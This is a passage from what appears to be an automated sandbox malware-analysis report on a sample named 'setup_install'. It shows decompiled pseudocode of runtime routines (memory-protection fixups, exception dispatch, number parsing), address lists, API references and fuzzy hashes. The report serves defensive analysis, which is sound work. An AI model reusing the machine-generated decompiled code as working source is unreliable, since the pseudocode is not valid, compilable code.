					_a4 = _t85;
					0x498c10();
					 *_t191 = _t85;
					_t131 = _t85;
					_t86 = E0040CD10();
					_t170 = _t86;
					if(_t86 == 0) {
						L11:
						_a4 = _t131;
						 *_t191 = 0x4a4a00;
						0x498c10();
						_push(_t170);
						_push(0);
						_push(_t131);
						_t192 = _t191 - 0x3c;
						_t132 =  *0x4e649c; // 0x1
						__eflags = _t132;
						if(_t132 == 0) {
							 *0x4e649c = 1;
							_t91 = L0040CF70(0x0000001e + (E0040CD80() + _t87 * 0x00000004) * 0x00000004 & 0xfffffff0);
							 *0x4e64a0 = 0;
							_t193 = _t192 - _t91;
							 *0x4e64a4 =  &_v45 & 0xfffffff0;
							_t86 = 0;
							__eflags = 0x4ab040 - 7;
							if(0x4ab040 <= 7) {
								goto L13;
							} else {
								__eflags = 0x4ab040 - 0xb;
								_t157 =  *0x4ab040;
								if(0x4ab040 <= 0xb) {
									_t150 = 0x4ab040;
									goto L30;
								} else {
									__eflags = _t157;
									if(_t157 == 0) {
										L39:
										__eflags =  *0x4ab044;
										if( *0x4ab044 != 0) {
											goto L17;
										} else {
											__eflags =  *0x4ab048;
											if( *0x4ab048 != 0) {
												_t150 = 0x4ab040;
												goto L32;
											} else {
												_t157 =  *0x4ab04c;
												_t150 = 0x4ab04c;
												L30:
												__eflags = _t157;
												if(_t157 != 0) {
													goto L18;
												} else {
													_t86 =  *(_t150 + 4);
													__eflags = _t86;
													if(_t86 != 0) {
														goto L18;
													} else {
														L32:
														_t86 =  *(_t150 + 8);
														__eflags = _t86 - 1;
														if(_t86 != 1) {
															_v72 = _t86;
															 *_t193 = 0x4a4a7c;
															0x498c10();
															_push(_t132);
															_t196 = _t193 - 0x18;
															_t137 = _v72;
															_t104 =  *( *_t137);
															__eflags = _t104 - 0xc0000091;
															if(_t104 > 0xc0000091) {
																__eflags = _t104 - 0xc0000094;
																if(_t104 == 0xc0000094) {
																	_v100 = 0;
																	 *_t196 = 8;
																	L0041B470();
																	__eflags = _t104 - 1;
																	if(_t104 != 1) {
																		goto L58;
																	} else {
																		_v100 = 1;
																		 *_t196 = 8;
																		L0041B470();
																		_t106 = 0xffffffff;
																	}
																} else {
																	__eflags = _t104 - 0xc0000096;
																	if(_t104 == 0xc0000096) {
																		goto L64;
																	} else {
																		__eflags = _t104 - 0xc0000093;
																		if(_t104 != 0xc0000093) {
																			goto L59;
																		} else {
																			goto L57;
																		}
																	}
																}
															} else {
																__eflags = _t104 - 0xc000008d;
																if(_t104 >= 0xc000008d) {
																	L57:
																	_v100 = 0;
																	 *_t196 = 8;
																	L0041B470();
																	__eflags = _t104 - 1;
																	if(_t104 == 1) {
																		_v100 = 1;
																		 *_t196 = 8;
																		L0041B470();
																		E0040C3F0(_t104);
																		_t106 = 0xffffffff;
																	} else {
																		L58:
																		__eflags = _t104;
																		if(_t104 != 0) {
																			 *_t196 = 8;
																			 *_t104();
																			_t106 = 0xffffffff;
																		} else {
																			goto L59;
																		}
																	}
																} else {
																	__eflags = _t104 - 0xc0000005;
																	if(_t104 != 0xc0000005) {
																		__eflags = _t104 - 0xc000001d;
																		if(_t104 != 0xc000001d) {
																			goto L59;
																		} else {
																			L64:
																			_v100 = 0;
																			 *_t196 = 4;
																			L0041B470();
																			__eflags = _t104 - 1;
																			if(_t104 == 1) {
																				_v100 = 1;
																				 *_t196 = 4;
																				L0041B470();
																				_t106 = _t104 | 0xffffffff;
																			} else {
																				__eflags = _t104;
																				if(_t104 == 0) {
																					goto L59;
																				} else {
																					 *_t196 = 4;
																					 *_t104();
																					_t106 = 0xffffffff;
																				}
																			}
																		}
																	} else {
																		_v100 = 0;
																		 *_t196 = 0xb;
																		L0041B470();
																		__eflags = _t104 - 1;
																		if(_t104 == 1) {
																			_v100 = 1;
																			 *_t196 = 0xb;
																			L0041B470();
																			_t106 = _t104 | 0xffffffff;
																		} else {
																			__eflags = _t104;
																			if(_t104 == 0) {
																				L59:
																				_t104 =  *0x4e64ac; // 0x0
																				__eflags = _t104;
																				if(_t104 != 0) {
																					_v72 = _t137;
																					_t196 = _t196 + 0x18;
																					_pop(_t137);
																					goto __eax;
																				}
																				_t106 = 0;
																			} else {
																				 *_t196 = 0xb;
																				 *_t104();
																				_t106 = 0xffffffff;
																			}
																		}
																	}
																}
															}
															return _t106;
														} else {
															_t57 = _t150 + 0xc; // 0x4ab04c
															_t185 = _t57;
															__eflags = _t185 - 0x4ab040;
															if(_t185 >= 0x4ab040) {
																goto L13;
															} else {
																_v56 = _t132;
																do {
																	_t110 =  *_t185;
																	_t132 =  *(_t185 + 8) & 0x000000ff;
																	_t151 =  *((intOrPtr*)(_t185 + 4));
																	_t163 = _t110 + 0x400000;
																	_t86 =  *(_t110 + 0x400000);
																	__eflags = _t132 - 0x10;
																	_t175 = _t151 + 0x400000;
																	_v48 = _t86;
																	if(_t132 == 0x10) {
																		_t139 =  *(_t151 + 0x400000) & 0x0000ffff;
																		_v52 = _t151;
																		__eflags =  *(_t151 + 0x400000);
																		_t140 =  <  ? _t139 | 0xffff0000 : _t139;
																		_t141 = ( <  ? _t139 | 0xffff0000 : _t139) - _t163;
																		_t142 = ( <  ? _t139 | 0xffff0000 : _t139) - _t163 + _v48;
																		__eflags = _t142;
																		_t86 = E0040C420(_t175, _t175, _t185);
																		 *(_v52 + 0x400000) = _t142;
																		goto L43;
																	} else {
																		__eflags = _t132 - 0x20;
																		if(_t132 == 0x20) {
																			_t86 = E0040C420(_t175, _t175, _t185);
																			 *_t175 = _v48 - _t163 +  *_t175;
																			goto L43;
																		} else {
																			__eflags = _t132 - 8;
																			if(_t132 == 8) {
																				_t153 =  *_t175 & 0x000000ff;
																				__eflags =  *_t175;
																				_t154 =  <  ? _t153 | 0xffffff00 : _t153;
																				_t155 = ( <  ? _t153 | 0xffffff00 : _t153) - _t163;
																				_t118 = _t86 + ( <  ? _t153 | 0xffffff00 : _t153) - _t163;
																				_t146 = _t86 + ( <  ? _t153 | 0xffffff00 : _t153) - _t163;
																				_t86 = E0040C420(_t175, _t175, _t185);
																				 *_t175 = _t86 + ( <  ? _t153 | 0xffffff00 : _t153) - _t163;
																				goto L43;
																			} else {
																				_v72 = _t132;
																				 *_t193 = 0x4a4ab0;
																				0x498c10();
																				goto L39;
																			}
																		}
																	}
																	goto L73;
																	L43:
																	_t185 = _t185 + 0xc;
																	__eflags = _t185 - 0x4ab040;
																} while (_t185 < 0x4ab040);
																_t135 = _v56;
																goto L23;
															}
														}
													}
												}
											}
										}
									} else {
										L17:
										_t150 = 0x4ab040;
										L18:
										__eflags = _t150 - 0x4ab040;
										if(_t150 >= 0x4ab040) {
											goto L13;
										} else {
											_t32 = _t150 + 8; // 0x4ab048
											_t179 = _t32;
											_v52 = _t132;
											_t158 = _t150;
											_t134 = _t179;
											_t35 = (0x4ab047 - _t179 >> 3) * 8; // 0x4ab048
											_v48 = _t150 + _t35 + 8;
											while(1) {
												_t172 =  *((intOrPtr*)(_t158 + 4));
												_t181 =  *((intOrPtr*)(_t172 + 0x400000)) +  *_t158;
												_t86 = E0040C420(_t172 + 0x400000, _t172, _t181);
												__eflags = _t134 - _v48;
												 *((intOrPtr*)(_t172 + 0x400000)) = _t181;
												_t158 = _t134;
												if(_t134 == _v48) {
													break;
												}
												_t134 = _t134 + 8;
												__eflags = _t134;
											}
											_t135 = _v52;
											L23:
											_t182 =  *0x4e64a0; // 0x0
											__eflags = _t182;
											if(_t182 <= 0) {
												goto L13;
											} else {
												_t173 =  &_v32;
												do {
													_t160 =  *0x4e64a4; // 0x71fd30
													_t101 = _t160 + (_t135 + _t135 * 4) * 4;
													_t161 =  *_t101;
													__eflags = _t161;
													if(_t161 != 0) {
														_t101 = VirtualProtect( *(_t101 + 4),  *(_t101 + 8), _t161, _t173);
														_t193 = _t193 - 0x10;
													}
													_t135 = _t135 + 1;
													__eflags = _t135 -  *0x4e64a0; // 0x0
												} while (__eflags < 0);
												return _t101;
											}
										}
									}
								}
							}
						} else {
							L13:
							return _t86;
						}
					} else {
						_t120 =  *0x4e64a4; // 0x71fd30
						_t131 = 0 << 2;
						_t121 = _t120;
						 *(_t121 + 0x10) = _t170;
						 *_t121 = 0;
						_t123 = E0040CE10() +  *((intOrPtr*)(_t170 + 0xc));
						_t165 =  *0x4e64a4; // 0x71fd30
						 *(_t165 + 0xc) = _t123;
						_a8 = 0x1c;
						 *_t191 = _t123;
						_a4 =  &_a20;
						_t124 = VirtualQuery(??, ??, ??);
						_t191 = _t191 - 0xc;
						if(_t124 == 0) {
							_t125 =  *0x4e64a4; // 0x71fd30
							_a8 =  *((intOrPtr*)(_t125 + 0xc));
							_t86 =  *(_t170 + 8);
							 *_t191 = 0x4a4a20;
							_a4 = _t86;
							0x498c10();
							goto L11;
						} else {
							_t127 = _a40;
							if((_t127 - 0x00000040 & 0xffffffbf) == 0) {
								break;
							} else {
								_t127 = _t127 - 0x00000004 & 0xfffffffb;
								if(_t127 != 0) {
									continue;
								} else {
									break;
								}
							}
						}
					}
					L73:
				}
				 *0x4e64a0 =  *0x4e64a0 + 1;
				return _t127;
				goto L73;
			}

0x0040c4e0
0x0040c4e0
0x0040c4e6
0x0040c4ea
0x0040c4ee
0x0040c4f1
0x0040c4f4
0x0040c4f8
0x0040c500
0x0040c504
0x0040c507
0x0040c50d
0x0040c510
0x0040c512
0x00000000
0x00000000
0x0040c514
0x0040c51a
0x0040c521
0x0040c525
0x0040c45e
0x0040c461
0x0040c463
0x0040c46a
0x0040c46c
0x0040c557
0x0040c557
0x0040c55b
0x0040c562
0x0040c573
0x0040c574
0x0040c575
0x0040c576
0x0040c579
0x0040c57f
0x0040c581
0x0040c590
0x0040c5ac
0x0040c5b1
0x0040c5bb
0x0040c5c4
0x0040c5ce
0x0040c5d3
0x0040c5d6
0x00000000
0x0040c5d8
0x0040c5d8
0x0040c5db
0x0040c5e1
0x0040c6a1
0x00000000
0x0040c5e7
0x0040c5e7
0x0040c5e9
0x0040c725
0x0040c72b
0x0040c72d
0x00000000
0x0040c733
0x0040c739
0x0040c73b
0x0040c7d6
0x00000000
0x0040c741
0x0040c741
0x0040c747
0x0040c6a6
0x0040c6a6
0x0040c6a8
0x00000000
0x0040c6ae
0x0040c6ae
0x0040c6b1
0x0040c6b3
0x00000000
0x0040c6b9
0x0040c6b9
0x0040c6b9
0x0040c6bc
0x0040c6bf
0x0040c7e0
0x0040c7e4
0x0040c7eb
0x0040c7f0
0x0040c7f1
0x0040c7f4
0x0040c7fa
0x0040c7fc
0x0040c801
0x0040c850
0x0040c855
0x0040c8a1
0x0040c8a9
0x0040c8b0
0x0040c8b5
0x0040c8b8
0x00000000
0x0040c8ba
0x0040c8ba
0x0040c8c2
0x0040c8c9
0x0040c8ce
0x0040c8ce
0x0040c857
0x0040c857
0x0040c85c
0x00000000
0x0040c85e
0x0040c85e
0x0040c863
0x00000000
0x00000000
0x00000000
0x00000000
0x0040c863
0x0040c85c
0x0040c803
0x0040c803
0x0040c808
0x0040c865
0x0040c865
0x0040c86d
0x0040c874
0x0040c879
0x0040c87c
0x0040c925
0x0040c92d
0x0040c934
0x0040c939
0x0040c93e
0x0040c882
0x0040c882
0x0040c882
0x0040c884
0x0040c910
0x0040c917
0x0040c919
0x00000000
0x00000000
0x00000000
0x0040c884
0x0040c80a
0x0040c80a
0x0040c80f
0x0040c8d5
0x0040c8da
0x00000000
0x0040c8dc
0x0040c8dc
0x0040c8dc
0x0040c8e4
0x0040c8eb
0x0040c8f0
0x0040c8f3
0x0040c945
0x0040c94d
0x0040c954
0x0040c959
0x0040c8f5
0x0040c8f5
0x0040c8f7
0x00000000
0x0040c8f9
0x0040c8f9
0x0040c900
0x0040c902
0x0040c902
0x0040c8f7
0x0040c8f3
0x0040c815
0x0040c815
0x0040c81d
0x0040c824
0x0040c829
0x0040c82c
0x0040c95e
0x0040c966
0x0040c96d
0x0040c972
0x0040c832
0x0040c832
0x0040c834
0x0040c88a
0x0040c88a
0x0040c88f
0x0040c891
0x0040c897
0x0040c89b
0x0040c89e
0x0040c89f
0x0040c89f
0x0040c980
0x0040c836
0x0040c836
0x0040c83d
0x0040c83f
0x0040c83f
0x0040c834
0x0040c82c
0x0040c80f
0x0040c808
0x0040c922
0x0040c6c5
0x0040c6c5
0x0040c6c5
0x0040c6c8
0x0040c6ce
0x00000000
0x0040c6d4
0x0040c6d4
0x0040c6e0
0x0040c6e0
0x0040c6e2
0x0040c6e6
0x0040c6e9
0x0040c6ef
0x0040c6f5
0x0040c6f8
0x0040c6fe
0x0040c701
0x0040c751
0x0040c758
0x0040c762
0x0040c76a
0x0040c76f
0x0040c771
0x0040c771
0x0040c774
0x0040c77c
0x00000000
0x0040c703
0x0040c703
0x0040c706
0x0040c7cd
0x0040c7d2
0x00000000
0x0040c70c
0x0040c70c
0x0040c70f
0x0040c7a0
0x0040c7ab
0x0040c7ae
0x0040c7b1
0x0040c7b3
0x0040c7b5
0x0040c7b9
0x0040c7be
0x00000000
0x0040c715
0x0040c715
0x0040c719
0x0040c720
0x00000000
0x0040c720
0x0040c70f
0x0040c706
0x00000000
0x0040c783
0x0040c783
0x0040c786
0x0040c786
0x0040c792
0x00000000
0x0040c792
0x0040c6ce
0x0040c6bf
0x0040c6b3
0x0040c6a8
0x0040c73b
0x0040c5ef
0x0040c5ef
0x0040c5ef
0x0040c5f4
0x0040c5f4
0x0040c5fa
0x00000000
0x0040c5fc
0x0040c5fc
0x0040c5fc
0x0040c604
0x0040c607
0x0040c60b
0x0040c610
0x0040c614
0x0040c623
0x0040c623
0x0040c634
0x0040c636
0x0040c63b
0x0040c63e
0x0040c644
0x0040c646
0x00000000
0x00000000
0x0040c620
0x0040c620
0x0040c620
0x0040c648
0x0040c64b
0x0040c64b
0x0040c651
0x0040c653
0x00000000
0x0040c659
0x0040c65f
0x0040c662
0x0040c662
0x0040c66b
0x0040c66e
0x0040c670
0x0040c672
0x0040c689
0x0040c68b
0x0040c68b
0x0040c68e
0x0040c691
0x0040c691
0x0040c6a0
0x0040c6a0
0x0040c653
0x0040c5fa
0x0040c5e9
0x0040c5e1
0x0040c583
0x0040c583
0x0040c58a
0x0040c58a
0x0040c472
0x0040c472
0x0040c47a
0x0040c47d
0x0040c47f
0x0040c482
0x0040c48d
0x0040c490
0x0040c496
0x0040c49e
0x0040c4a6
0x0040c4a9
0x0040c4ad
0x0040c4b3
0x0040c4b8
0x0040c537
0x0040c540
0x0040c544
0x0040c547
0x0040c54e
0x0040c552
0x00000000
0x0040c4ba
0x0040c4ba
0x0040c4c4
0x00000000
0x0040c4c6
0x0040c4c9
0x0040c4cc
0x00000000
0x00000000
0x00000000
0x00000000
0x0040c4cc
0x0040c4c4
0x0040c4b8
0x00000000
0x0040c46c
0x0040c4ce
0x0040c4db
0x00000000

APIs

VirtualQuery.KERNEL32 ref: 0040C4AD
VirtualProtect.KERNEL32 ref: 0040C507
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004AB048), ref: 0040C514

Part of subcall function 00498C10: fwrite.MSVCRT ref: 00498C3F
Part of subcall function 00498C10: vfprintf.MSVCRT ref: 00498C5F
Part of subcall function 00498C10: abort.MSVCRT ref: 00498C64
Part of subcall function 00498C10: abort.MSVCRT ref: 00498C6C
Part of subcall function 00498C10: abort.MSVCRT ref: 00498C71
Part of subcall function 00498C10: abort.MSVCRT ref: 00498C76
Part of subcall function 00498C10: abort.MSVCRT ref: 00498C7B
Part of subcall function 00498C10: abort.MSVCRT ref: 00498C80
Part of subcall function 00498C10: abort.MSVCRT(0040F34B), ref: 00498C85
Part of subcall function 00498C10: abort.MSVCRT(0040F34B), ref: 00498C8A
Part of subcall function 00498C10: abort.MSVCRT(0040F34B), ref: 00498C8F
Part of subcall function 00498C10: abort.MSVCRT(0040F34B), ref: 00498C94
Part of subcall function 00498C10: abort.MSVCRT(0040F34B), ref: 00498C99
Part of subcall function 00498C10: abort.MSVCRT(0040F34B), ref: 00498C9E
Part of subcall function 00498C10: abort.MSVCRT(0040F34B), ref: 00498CA3
Part of subcall function 00498C10: abort.MSVCRT(?,?,20247C8B,?,0041C520,474E5543,0040FB3E), ref: 00498CA8
Part of subcall function 00498C10: abort.MSVCRT(?,?,20247C8B,?,0041C520,474E5543,0040FB3E), ref: 00498CB0
Part of subcall function 00498C10: abort.MSVCRT(?,?,20247C8B,?,0041C520,474E5543,0040FB3E), ref: 00498CB5

Strings

@, xrefs: 0040C4F8

Memory Dump Source

Source File: 00000007.00000002.304000935.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.303997911.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304077955.000000000049F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304082819.00000000004A1000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304091149.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304129679.00000000004E6000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304134557.00000000004EA000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304152406.000000000050D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304163755.000000000051B000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_setup_install.jbxd

Similarity

API ID: abort$Virtual$ErrorLastProtectQueryfwritevfprintf
String ID: @
API String ID: 2966409508-2766056989
Opcode ID: f6acf4e48481dd403df313f669e898d3eb127efa97153f5742e5ee48cbf87664
Instruction ID: 50fc8a12dddddb159f22319d6a1651cee6e70f765937a5c99568310cf8cab8b1
Opcode Fuzzy Hash: f6acf4e48481dd403df313f669e898d3eb127efa97153f5742e5ee48cbf87664
Instruction Fuzzy Hash: 0F213DB2804301DFC700DF28D9C461ABBE0BF84358F058A3EE9989B2A6E338D544CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0041B659, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 17stringCOMMON

Download Yara Rule

APIs

setlocale.MSVCRT ref: 0041B672
strchr.MSVCRT ref: 0041B682
atoi.MSVCRT ref: 0041B695

Strings

., xrefs: 0041B677

Memory Dump Source

Source File: 00000007.00000002.304000935.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.303997911.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304077955.000000000049F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304082819.00000000004A1000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304091149.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304129679.00000000004E6000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304134557.00000000004EA000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304152406.000000000050D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304163755.000000000051B000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_setup_install.jbxd

Similarity

API ID: atoisetlocalestrchr
String ID: .
API String ID: 1223908000-248832578
Opcode ID: 6ec695c95e5158b237a47780eb4b63e0ff4ebffa70a992a204c78cef1383d635
Instruction ID: 08b81352c51e454de67f20d3cf13ce857e41ae7a6ebeb3dfc66a4ac17dca0c52
Opcode Fuzzy Hash: 6ec695c95e5158b237a47780eb4b63e0ff4ebffa70a992a204c78cef1383d635
Instruction Fuzzy Hash: DEE0ECB59057004AD7007F79C50936BB6E2EB90308F45C82DD4C44B246EB7D94849BC6

Uniqueness

Uniqueness Score: -1.00%

Function 00414069, Relevance: 6.3, APIs: 2, Strings: 2, Instructions: 251
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E00414069(void* __eax, void* __edi) {
				void* _t358;

				while(1) {
					__esi = __esp[0xb];
					__ebx = __esi;
					__ebx = __esi - __eax;
					__eax = __esp[0x31];
					__eax = E0041AB00(__esp[0x31], __ebx);
					__esp[0x2f] = __esp[0x2f] - __ebx;
					__esp[0x31] = __eax;
					__esp[0x2e] = __esi;
					goto L55;
					do {
						do {
							L55:
							__eax =  &(__esp[0x2c]);
							__fp0 = __esp[0x10];
							__esp[3] =  &(__esp[0x2c]);
							__eax =  &(__esp[0x2b]);
							__esi = L0041AF50(__esp[0x10],  &(__esp[0x2b]));
							__eax = __esp[0x2b];
							__eflags = __eax;
							if(__eflags < 0) {
								__eax =  ~__eax;
								 *__esp = __esi;
								__esp[1] = __eax;
								__eax = L00419F30();
							} else {
								if(__eflags != 0) {
									__esi = __eax;
								}
							}
							__eax = __esp[0x13];
							__ebx = __esp[0x31];
							__esp[1] = __esi;
							__eflags = __esp[0x13];
							 *__esp = __ebx;
							if(__esp[0x13] != 0) {
								__eax = E0041AC70();
								__ecx = __esp[0xe];
								__esp[0x31] = __eax;
								__eflags = __esp[0xe];
								if(__esp[0xe] != 0) {
									goto L23;
								}
								__edx =  *(__ebx + 0x10);
								__ecx = __edx - 1;
								__eflags =  *(__eax + 0x10) - __ecx;
								if( *(__eax + 0x10) <= __ecx) {
									L21:
									__ecx = __esp[0x19];
									__eflags = __esp[0x22] - __esp[0x19];
									if(__esp[0x22] != __esp[0x19]) {
										__eax = E0041AB00(__eax, 1);
										 *__esp = __esi;
										__esp[0x31] = __eax;
										__esp[0x2f] = __esp[0x2f] - 1;
										_t163 =  &(__esp[0x22]);
										 *_t163 = __esp[0x22] - 1;
										__eflags =  *_t163;
										goto L74;
									}
									__eax = __esp[0x13];
									_t38 =  &(__esp[0x2e]);
									 *_t38 = __esp[0x2e] - 1;
									__eflags =  *_t38;
									__esp[0xe] = __esp[0x13];
									goto L23;
								}
								__edx = __edx + 3;
								asm("bsr ecx, [eax+edx*4+0x4]");
								asm("bsr edx, [ebx+edx*4+0x4]");
								__ecx = __ecx ^ 0x0000001f;
								__edx = __edx ^ 0x0000001f;
								__eflags = __edx - __ecx;
								if(__edx >= __ecx) {
									goto L23;
								}
								goto L21;
							} else {
								__eax = E004146F0();
								__edx =  *(__eax + 0x10);
								__esp[0x31] = __eax;
								__ecx = __edx - 1;
								__eflags =  *(__ebx + 0x10) - __ecx;
								if( *(__ebx + 0x10) <= __ecx) {
									L61:
									__edx = __esp[0xe];
									__eflags = __esp[0xe];
									if(__esp[0xe] == 0) {
										__esp[1] = 1;
										 *__esp = __eax;
										__eax = L00419F30();
										__esp[0x2f] = __esp[0x2f] + 1;
										__esp[0x22] = __esp[0x22] + 1;
										__esp[0x14] = 0;
									} else {
										__eax = __esp[0x2e];
										__eax = __esp[0x2e] + 1;
										__eflags = __eax - __esp[0xb];
										__esp[0x2e] = __eax;
										__eax = __al & 0x000000ff;
										__esp[0xe] = __al & 0x000000ff;
									}
									L23:
									E0041A680(__esi) = E0041A680(__ebx);
									__eax = __esp[0xd];
									__eflags = __esp[0xd];
									if(__esp[0xd] != 0) {
										L84:
										__eax = __esp[0xe];
										__eflags = __esp[0xe];
										if(__esp[0xe] == 0) {
											L113:
											__eax = __esp[0x2e];
											__esp[0xe] = __esp[0x2e];
											L114:
											__eax = __esp[0xb];
											__eax = __esp[0xb] - __esp[0xe];
											__eflags = __eax;
											__esp[0xe] = __eax;
											if(__eflags == 0) {
												goto L85;
											}
											__eax = __esp[0x31];
											if(__eflags <= 0) {
												__edx = __esp[0xe];
												 *__esp = __eax;
												__edx =  ~(__esp[0xe]);
												__esp[1] =  ~(__esp[0xe]);
												__eax = L00419F30();
											} else {
												__ebx = __esp[0xe];
												__esp[0x31] = __eax;
											}
											__eax = __esp[0x2f];
											__eax = __esp[0x2f] - __esp[0xe];
											__esp[0xe] = 0;
											__esp[0x2f] = __eax;
											L86:
											__ebx = __esp[0x3f];
											 *(__esp[0x3f]) = __eax;
											E0041A680(__edi) = __esp[0xc];
											E0041A680(__esp[0xc]) = __esp[8];
											E0041A680(__esp[8]) = __esp[0x1d];
											E0041A680(__esp[0x1d]) = E0041A680(__ebp);
											__eax = __esp[0x3e];
											__edi = __esp[0x2f];
											__eflags =  *((intOrPtr*)(__eax + 8)) - __esp[0x2f];
											if( *((intOrPtr*)(__eax + 8)) >= __esp[0x2f]) {
												L12:
												__edi = __esp[0xe];
												__eax = __esp[0x31];
												__eflags = __esp[0xe];
												if(__esp[0xe] != 0) {
													__esi = __esp[0x1e];
													__ecx = __eax;
													__eflags = __esp[0x1e];
													if(__esp[0x1e] != 0) {
														 *(__ecx + 0x10) = 0;
														__esp[0x2d] = 0x50;
														L0041B5C8();
														 *__eax = 0x22;
														__eax = __esp[0x31];
													} else {
														__edx = __esp[0x2d];
														__ebx =  *(__eax + 0x10);
														__ecx = __edx;
														__edx = __edx & 0x00000030;
														__ecx = __ecx & 0xfffffff8;
														__eflags =  *(__eax + 0x10);
														if( *(__eax + 0x10) > 0) {
															__ecx = __ecx | 0x00000002;
															__eflags = __ecx;
														}
														__eflags = __edx;
														if(__edx != 0) {
															__ecx = __ecx | 0x00000040;
															__eflags = __ecx;
															__esp[0x2d] = __ecx;
															L0041B5C8();
															 *__eax = 0x22;
															__eax = __esp[0x31];
														} else {
															__esp[0x2d] = __ecx;
														}
													}
												}
												__ecx = __esp[0x3d];
												__eflags = __esp[0x3d];
												if(__esp[0x3d] != 0) {
													__edx = __esp[0x30];
													__edi = __esp[0x3d];
													 *(__esp[0x3d]) = __esp[0x30];
												}
												__edx = __esp[0x18];
												__eflags = __esp[0x18];
												if(__esp[0x18] != 0) {
													_t6 =  &(__esp[0x2d]);
													 *_t6 = __esp[0x2d] | 0x00000008;
													__eflags =  *_t6;
												}
												__eflags = __eax;
												if(__eax != 0) {
													__esp[2] = __eax;
													__eax = __esp[0xb];
													__esp[1] = __esp[0xb];
													__eax = __esp[0x40];
													 *__esp = __esp[0x40];
													E0041B270() = __esp[0x31];
													__eax = E0041A680(__esp[0x31]);
												}
												return  *((intOrPtr*)(_t358 + 0xb4));
											}
											__eax =  *(__eax + 0xc);
											__esp[8] = __eax;
											__eax = __eax & 0x00000003;
											__eflags = __eax - 2;
											if(__eax == 2) {
												__eax = __esp[0x18];
												__eflags = __esp[0x18];
												if(__esp[0x18] == 0) {
													L11:
													__eax = __esp[0x31];
													__esp[0x2d] = 0xa3;
													 *(__eax + 0x10) = 0;
													L0041B5C8();
													 *__eax = 0x22;
													__eax = __esp[0x3e];
													__edi = __esp[0x3f];
													__eax =  *(__esp[0x3e] + 8);
													__eax =  *(__esp[0x3e] + 8) + 1;
													__eflags = __eax;
													 *(__esp[0x3f]) = __eax;
													goto L12;
												}
												L90:
												__esp[0x31] = E0041A680(__esp[0x31]);
												__eax = __esp[0x3e];
												__edi = __esp[0x3f];
												__esp[0x31] = 0;
												__esp[0x2d] = 0x11;
												__eax =  *(__esp[0x3e] + 8);
												 *(__esp[0x3f]) =  *(__esp[0x3e] + 8);
												__eax = __esp[0x3e];
												__edi = __esp[0x40];
												__ecx =  *(__esp[0x3e]);
												__eax = __ecx + 0x1f;
												__eax = __ecx + 0x1f >> 5;
												__edx = __edi + (__ecx + 0x1f >> 5) * 4;
												__eax = __edi;
												__eflags = __edi - __edx;
												if(__edi >= __edx) {
													L93:
													__ecx = __ecx & 0x0000001f;
													__eflags = __ecx;
													if(__ecx != 0) {
														0x20 = 0x20 - __ecx;
														__ecx = 0x20 - __ecx;
														 *(__edx - 4) =  *(__edx - 4) >> __cl;
													}
													goto L12;
												}
												do {
													__eax = __eax + 4;
													 *(__eax - 4) = 0xffffffff;
													__eflags = __edx - __eax;
												} while (__edx > __eax);
												goto L93;
											}
											__eflags = __eax - 3;
											if(__eax == 3) {
												__ebp = __esp[0x18];
												__eflags = __esp[0x18];
												if(__esp[0x18] != 0) {
													goto L11;
												}
												goto L90;
											}
											__eflags = __eax - 1;
											if(__eax == 1) {
												goto L11;
											}
											goto L90;
										}
										L85:
										__eax = __esp[0x2f];
										goto L86;
									}
									__esp[0x2e] = __esp[0x2e] + __esp[0x2f];
									__eflags = __esp[0x2e] + __esp[0x2f] - __esp[0x15];
									if(__esp[0x2e] + __esp[0x2f] != __esp[0x15]) {
										L30:
										__eax = __esp[0xe];
										__eflags = __esp[0xe];
										if(__esp[0xe] == 0) {
											L74:
											__eax = __esp[0x31];
											__eax = E0041A040(__esp[0x31]);
											__esp[0xe] = 0;
											__esp[0xd] = __eax;
										}
										E0041A680(__edi) = __esp[0xc];
										E0041A680(__esp[0xc]) = __esp[8];
										E0041A680(__esp[8]) = E0041A680(__ebp);
										__edi = __esp[0x1d];
										__eax =  *(__edi + 4);
										__eax = E0041A5B0( *(__edi + 4));
										__edx =  *(__edi + 0x10);
										__edi = __esp[0x1f];
										__esp[0xc] = __eax;
										 *__esp = __eax;
										__edx = 8 + __edx * 4;
										__esp[1] = __esp[0x1f];
										__esp[2] = __edx;
										__eax = memcpy(??, ??, ??);
										__esp[0x31] =  *(__esp[0x31] + 4);
										__edi = E0041A5B0( *(__esp[0x31] + 4));
										__eax = __esp[0x31];
										_t63 = __edi + 0xc; // 0xc
										__edx = _t63;
										__ecx =  *(__eax + 0x10);
										__eax = __eax + 0xc;
										 *__esp = _t63;
										__esp[1] = __eax;
										__esp[2] = __ecx;
										__eax = memcpy(??, ??, ??);
										__eax = __esp[0xd];
										__esi = __esp[0x2e];
										 *__esp = 1;
										__esi = __esp[0x2e] - __eax;
										__eax = __eax + __esp[0x2f];
										__esp[0x10] = __esi;
										__ebx = __eax;
										__eax = E0041A7E0();
										__eflags = __ebx;
										__esp[8] = __eax;
										if(__ebx < 0) {
											__eax = __esp[0x1a];
											__esi = __esp[0x12];
											__eax = __esp[0x1a] - __ebx;
										} else {
											__eax = __esp[0x12];
											__esi = __esp[0x12] + __ebx;
											__eax = __esp[0x1a];
										}
										__ecx = __esp[0x10];
